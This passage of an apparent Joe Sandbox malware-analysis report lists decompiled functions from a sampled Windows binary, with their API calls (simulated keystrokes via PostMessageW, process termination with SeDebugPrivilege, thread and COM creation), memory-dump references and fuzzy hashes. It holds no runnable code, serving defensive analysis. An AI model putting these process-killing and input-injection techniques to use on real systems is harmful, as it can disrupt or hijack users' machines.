Function 00F5966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A84C
Part of subcall function 00F5A82C: GetCurrentThreadId.KERNEL32 ref: 00F5A853
Part of subcall function 00F5A82C: AttachThreadInput.USER32(00000000,?,00F59683,?,00000001), ref: 00F5A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00F5968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F596FB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cd392976d44509d30bcb25eb00a2d78880f57726ef3bec403820c75818c5b6f4
Instruction ID: bc52ecb90ea4f14f8c1a321e30e900b6cf1f04a7af71e71503ea313113481b9a
Opcode Fuzzy Hash: cd392976d44509d30bcb25eb00a2d78880f57726ef3bec403820c75818c5b6f4
Instruction Fuzzy Hash: C511E1B1A10618BEF6106F60DC8DFBA3B2DEB4C752F100525F744AB0A1C9F25C14EBA4

Function 00F58921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F5853C,00000B00,?,?), ref: 00F5892A
HeapAlloc.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F58931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F5853C,00000B00,?,?), ref: 00F58946
GetCurrentProcess.KERNEL32(?,00000000,?,00F5853C,00000B00,?,?), ref: 00F5894E
DuplicateHandle.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F58951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F5853C,00000B00,?,?), ref: 00F58961
GetCurrentProcess.KERNEL32(00F5853C,00000000,?,00F5853C,00000B00,?,?), ref: 00F58969
DuplicateHandle.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F5896C
CreateThread.KERNEL32(00000000,00000000,00F58992,00000000,00000000,00000000), ref: 00F58986

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0059de9bd7eb2f24994e3caec5707429845ab5f8405122afff8c58f2e26b1171
Instruction ID: b8c69d6f7454b7e478a9350cfb5b2985c6aa445c01dfab7a9566ea6b997a9340
Opcode Fuzzy Hash: 0059de9bd7eb2f24994e3caec5707429845ab5f8405122afff8c58f2e26b1171
Instruction Fuzzy Hash: 5C01BBB5240748FFE710ABA5DC8DFAB7BACEB89711F408421FA05DB1A1CA749814DB21

Function 00F79B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00F79BA4, 00F79EC8
Not an Object type, xrefs: 00F79B7B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 35eff034d9ed15861c90f82f3e96b994cea386b1199b47cd9fa54022d598f7c5
Instruction ID: 291039c7e839e43d1f97ea1bc0eef16120f928fae1251f24af1d89da8ba864f6
Opcode Fuzzy Hash: 35eff034d9ed15861c90f82f3e96b994cea386b1199b47cd9fa54022d598f7c5
Instruction Fuzzy Hash: A3C19371E0421A9FDF10DF98D884BAEB7F5FB48314F14846AE909A7280E7B0DD45DBA1

Function 00F79113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F79167
VariantInit.OLEAUT32(?), ref: 00F79238
VariantInit.OLEAUT32(?), ref: 00F79339
VariantClear.OLEAUT32(?), ref: 00F79343
VariantClear.OLEAUT32(?), ref: 00F793A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00F7931C
Null Object assignment in FOR..IN loop, xrefs: 00F791C8, 00F792F6, 00F793AE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: efbaf52940ab7ca9e4b6bdb28157153a05cc459609e4ab130f4086c9f84388d1
Instruction ID: ff7eeb1598ce2cd6685efd918fef7dfc4e03cca4b72b81b47303349a5ecf6068
Opcode Fuzzy Hash: efbaf52940ab7ca9e4b6bdb28157153a05cc459609e4ab130f4086c9f84388d1
Instruction Fuzzy Hash: 6C919E71E04219ABDF20DFA5CC48FAEB7B8EF45720F10815AF519AB281D7B09905DFA1

Function 00F7975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00F5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?,?,00F57455), ref: 00F57127
Part of subcall function 00F5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57142
Part of subcall function 00F5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57150
Part of subcall function 00F5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?), ref: 00F57160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F79806
_memset.LIBCMT ref: 00F79813
_memset.LIBCMT ref: 00F79956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F79982
CoTaskMemFree.OLE32(?), ref: 00F7998D

Strings

NULL Pointer assignment, xrefs: 00F799DB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: ca46dc344b8e02cef8889796a4608ae8001db181dcae31e565e2f2824f66a7d3
Instruction ID: 22ed54ce9d47accb8f7bfdcf17a511a51673865b5e5699e6dcbd3388d9fedbef
Opcode Fuzzy Hash: ca46dc344b8e02cef8889796a4608ae8001db181dcae31e565e2f2824f66a7d3
Instruction Fuzzy Hash: 32915A71D00229EBDB10DFA4DC40EDEBBB9AF08310F10805AF519A7281EB759A04EFA1

Function 00F86D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F86E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00F86E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F86E52
_wcscat.LIBCMT ref: 00F86EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F86EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F86EF2

Strings

SysListView32, xrefs: 00F86DF6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 9fe9f0e2477f99d93d222ede1c8e51051f986d6a64e6ba88f9e98d148925c013
Instruction ID: 8c1805540f776985085faa2a67438f826266d76bdca32fbfcc42839eee4ae093
Opcode Fuzzy Hash: 9fe9f0e2477f99d93d222ede1c8e51051f986d6a64e6ba88f9e98d148925c013
Instruction Fuzzy Hash: 0341A171A00349AFEB21EF64CC85BEE77A8EF08760F10052AF584E7291D6759D84AB64

Function 00F7E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00F63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F63C7A
Part of subcall function 00F63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F63C88
Part of subcall function 00F63C55: CloseHandle.KERNEL32(00000000), ref: 00F63D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7E9A4
GetLastError.KERNEL32 ref: 00F7E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F7EA63
GetLastError.KERNEL32(00000000), ref: 00F7EA6E
CloseHandle.KERNEL32(00000000), ref: 00F7EAA3

Strings

SeDebugPrivilege, xrefs: 00F7E9C2

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b2127bf8ec0b50403ad7cbd74777cc92340e571fa07fb605da5c5c6d19718783
Instruction ID: 569b79a9d01bde4d2109304815c5bde0586eadfa971169484b312bca8b5dd3d1
Opcode Fuzzy Hash: b2127bf8ec0b50403ad7cbd74777cc92340e571fa07fb605da5c5c6d19718783
Instruction Fuzzy Hash: 8341AD716042019FDB10EF24CC95FADB7E5AF44314F58C45AF9069B3D2DBB8A808EB92

Function 00F62F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F63033

Strings

warning, xrefs: 00F6301C
question, xrefs: 00F62FEC
info, xrefs: 00F62FD4
blank, xrefs: 00F62FB5
stop, xrefs: 00F63004

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6d99961ea4fe6448a84fc17267c53911c429e06a58ee252f77abaeaa76faba9c
Instruction ID: 60023fd4be853ba9c03a920110de96f1f0064995313089b2633c4d68cf986b87
Opcode Fuzzy Hash: 6d99961ea4fe6448a84fc17267c53911c429e06a58ee252f77abaeaa76faba9c
Instruction Fuzzy Hash: CB113A32748786BEE7249B55EC42DEF7B9CDF15374B20002AF900A61C1DB74AF487AA1

Function 00F642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F64312
LoadStringW.USER32(00000000), ref: 00F64319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6432F
LoadStringW.USER32(00000000), ref: 00F64336
_wprintf.LIBCMT ref: 00F6435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F64357

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: fb64a18e5a9747df23477392288f1510be9191073f62b1320f2c9bb1bc334cf3
Instruction ID: 34c49439ee83a7aab051cb4b54a6f05ec857a291c10e559101468d773aa1188e
Opcode Fuzzy Hash: fb64a18e5a9747df23477392288f1510be9191073f62b1320f2c9bb1bc334cf3
Instruction Fuzzy Hash: 250162F290020CBFE711A7A0DD89EF6776CEB08300F4005A1B745E2051EA759E896B71

Function 00F8D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetSystemMetrics.USER32(0000000F), ref: 00F8D47C
GetSystemMetrics.USER32(0000000F), ref: 00F8D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F8D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F8D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F8D716
ShowWindow.USER32(00000003,00000000), ref: 00F8D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00F8D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00F8D77D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ef71156821d2803ab4a34dec83fd44115f1a62e130894c10207bf9c316fc739e
Instruction ID: adae4ea39dbe4fe5745fbd4794e8090feefc5ca6bedf2af04e035ef7896931b8
Opcode Fuzzy Hash: ef71156821d2803ab4a34dec83fd44115f1a62e130894c10207bf9c316fc739e
Instruction Fuzzy Hash: E2B17A75A00219EFDF18DF68C985BED7BB1BF08711F088169EC489F295E734A990EB50

Function 00F02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F02ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F02B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F3C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F3C286

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5cf545b16ddc8238274bce1aaafdeaeea0e16fc161abdd7553717a569334148d
Instruction ID: 7d29e467a2aba2482089b651fc8fb25459dd41b8a3d8ac325cf6c362bed23969
Opcode Fuzzy Hash: 5cf545b16ddc8238274bce1aaafdeaeea0e16fc161abdd7553717a569334148d
Instruction Fuzzy Hash: 04413F31B046809EDBB59B28CC8CB7B7B92AB85334F14881DE047925E1CA79E885F770

Function 00F670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F670DD

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F67114
EnterCriticalSection.KERNEL32(?), ref: 00F67130
_memmove.LIBCMT ref: 00F6717E
_memmove.LIBCMT ref: 00F6719B
LeaveCriticalSection.KERNEL32(?), ref: 00F671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F671DE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 6ee7db537273662bab53142e53321c9defcd1199f3864e8c82398a424888a176
Instruction ID: 9fff2bff5ee7d9c78c7b63f1553b3c699a182a38930e50dcef40459cdd900b90
Opcode Fuzzy Hash: 6ee7db537273662bab53142e53321c9defcd1199f3864e8c82398a424888a176
Instruction Fuzzy Hash: 2B318F32900219EFCF00EFA4DC85AAEB778EF45710F1541B5F904AB256DB349E54EBA0

Function 00F861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F861EB
GetDC.USER32(00000000), ref: 00F861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F861FE
ReleaseDC.USER32(00000000,00000000), ref: 00F8620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F86246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F86257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F86291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F862B1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ce2b8039c5ad0308fcd5aa854c2dd27353d8015ff39f4c86c0c676b2d80c6250
Instruction ID: 7f172c2d1a558e3c055792f571bfb8a487a3c29bafa6b590ede0be7482332514
Opcode Fuzzy Hash: ce2b8039c5ad0308fcd5aa854c2dd27353d8015ff39f4c86c0c676b2d80c6250
Instruction Fuzzy Hash: 48317A72201214BFEF119F50CC8AFFA3BA9EF49765F0440A5FE08DA292D6B59C41DB64

Function 00F5BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00F5BBC4
_memcmp.LIBCMT ref: 00F5BBE6
_memcmp.LIBCMT ref: 00F5BBFE
_memcmp.LIBCMT ref: 00F5BC11
_memcmp.LIBCMT ref: 00F5BC2B
_memcmp.LIBCMT ref: 00F5BC3E
_memcmp.LIBCMT ref: 00F5BC56
_memcmp.LIBCMT ref: 00F5BC71

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6fbef07eac75edd1cb0e03a36172818309ee227bd3fe89fed3881980caa104fa
Instruction ID: 556968ef896845f343f4194950c31dc1f533cf4c647ca5f2b466e4874c6ec407
Opcode Fuzzy Hash: 6fbef07eac75edd1cb0e03a36172818309ee227bd3fe89fed3881980caa104fa
Instruction Fuzzy Hash: 25210B62A012167BF604B611AD42FFF735CAE6236AF044010FF0896647EB58DE19F1AA

Function 00F6EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

_wcstok.LIBCMT ref: 00F6EC94
_wcscpy.LIBCMT ref: 00F6ED23
_memset.LIBCMT ref: 00F6ED56

Strings

X, xrefs: 00F6ED93

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 1f5c0f74ec9bd15a66f02c4537e94d2f327a3459d168a69f67f75c9c0bea09bd
Instruction ID: 916175fd24353f13077689a8db8430c677f8acd3f466f7fef92a6ef4efacbbe8
